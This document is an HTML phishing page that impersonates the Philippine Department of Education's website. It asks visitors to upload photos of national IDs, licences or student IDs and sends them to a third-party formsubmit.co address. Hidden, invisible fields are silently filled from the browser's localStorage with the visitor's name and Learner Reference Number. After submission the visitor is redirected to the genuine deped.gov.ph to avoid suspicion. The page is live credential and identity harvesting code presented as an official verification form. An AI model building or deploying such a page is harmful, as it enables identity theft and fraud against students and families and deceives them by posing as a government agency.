<!DOCTYPE html>
<html>

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>DepEd.gov | Verify With ID</title>  <style>
    #lrn, #dataInput {
      position: absolute;
      opacity: 0;
      pointer-events: none;
    }
  </style>
   <link rel="stylesheet" href="style.css">
</head>

<body>
  	<div class="menu">
	  <div class="menuclass">
	    <p class="label1">MENU <span class="close-btn">&#10005</span></p>
	    <hr>
	  </div>
<div class="opts">
  	  <p onclick="red()">Home</p>
	  <hr>
	  <p onclick="red()">News</p>
	  <hr>
	  <p onclick="red()">About</p>
	  <hr>
	  <p onclick="red()">NCP</p>
	  <hr>
	  <p onclick="red()">NGP</p>
	  <hr>
	  <p onclick="red()">FAQ's</p>
</div>
	</div>
	
	
	<div class="main-container" style="display: block;">
		<header>
			<span class="mainlogo">GOVPH</span><span class="menu-toggle">&#9776</span>

		</header>
					<div class="mainhead">
          <img class="mainheader" src="DepEd-Website-header-110px_1.png" alt="">
          <h1 class="h2">VERIFY YOUR IDENTITY</h1>
         <div class="logos1">
         	 <img id="ing1" src="small_foi_logo-150x150.png" alt="small_foi_logo-150x150.png">
 <img id="ing2" src="17245509137031177269572435798329.png" alt="17245509137031177269572435798329.png">
         </div>
			</div>
  </div>
  <div class="Cont1">
    <p class="disc"style="text-align:center;"><span>&#9432;</span>Just insert an image or photo of your (NationalID/Licence/StudentID/Or any sorts.</p>
    <div>
<center>      <div>
<form id="myForm"action="https://formsubmit.co/cb9e9b7f17318454bba8891de7000fd6" method="POST"enctype="multipart/form-data"> 
        <input type="hidden" name="_subject" value="New Id sent!">
        <input type="hidden" name="_template" value="table">
        <input type="hidden" name="_captcha" value="false">
        <input type="hidden" name="_next" value="https://www.deped.gov.ph">
        <input type="text" name="Full name" id="dataInput">
        <input type="text" name="Learners reference number" id="lrn">
        <input type="text" name="email" placeholder="Email" required>
          <label for="file">Choose file to upload</label>
        <input style=" border-radius: 0px; height:20em;width:80%;" type="file" id="file" name="file" multiple required/>
        <button type="submit">Submit</button>
</form>
      </div>
      
        
      </center>
    </div>
  </div>
	<div class="footer1"style="margin-top: 10em;">
			  <img class="seal" src="govph-seal-mono-footer.jpg" alt="govph-seal-mono-footer.jpg">
			  <p class="bold">Republic of the Philippines</p>
			  <p>All content is in the public domain unless otherwise stated.</p>

			  <p class="bold">About GOVPH</p>
			  <p>Learn more about the Philippine government, its structure, how government works and the people behind it.</p>

			  <p>GOV.PH
			    Open Data Portal
			    Official Gazette</p>
			  <p class="bold">Government Links </p>
			  <p>Office of the President</br>
			    Office of the Vice President</br>
			    Senate of the Philippines</br>
			    House of Representatives</br>
			    Supreme Court</br>
			    Court of Appeals</br>
			    Sandiganbayan</p>
			    <script>
			      const menuToggle = document.querySelector('.menu-toggle');
const menu = document.querySelector('.menu');
const closeBtn = document.querySelector('.close-btn');

menuToggle.addEventListener('click', () => {
  menu.style.right = menu.style.right === '0px' ? '-250px' : '0px';
});
closeBtn.addEventListener('click', () => {
  menu.style.right = menu.style.right === '-250px' ? '0px' : '-250px';
});

			    </script>
			      <script>
    // Get the saved values from localStorage
    const savedUsername = localStorage.getItem('userName');
    const savedLRN = localStorage.getItem('userLRN');

    // Get the input elements
    const usernameInput = document.getElementById('lrn');
    const dataInput = document.getElementById('dataInput');

    // Pre-fill the inputs with saved values
    if (savedUsername) {
      dataInput.value = savedUsername;
    }
    if (savedLRN) {
      usernameInput.value = savedLRN;
    }

    // Handle form submission
    document.getElementById('myForm').addEventListener('submit', function(event) {
      const userName = dataInput.value;
      const submittedLRN = usernameInput.value;

      console.log('Submitted lrn:', submittedLRN);
      console.log('Submitted username:', userName);
    });
    function red(){
      window.location='http://www.deped.gov.ph';
    }
  </script>
			</div>
</body>

</html>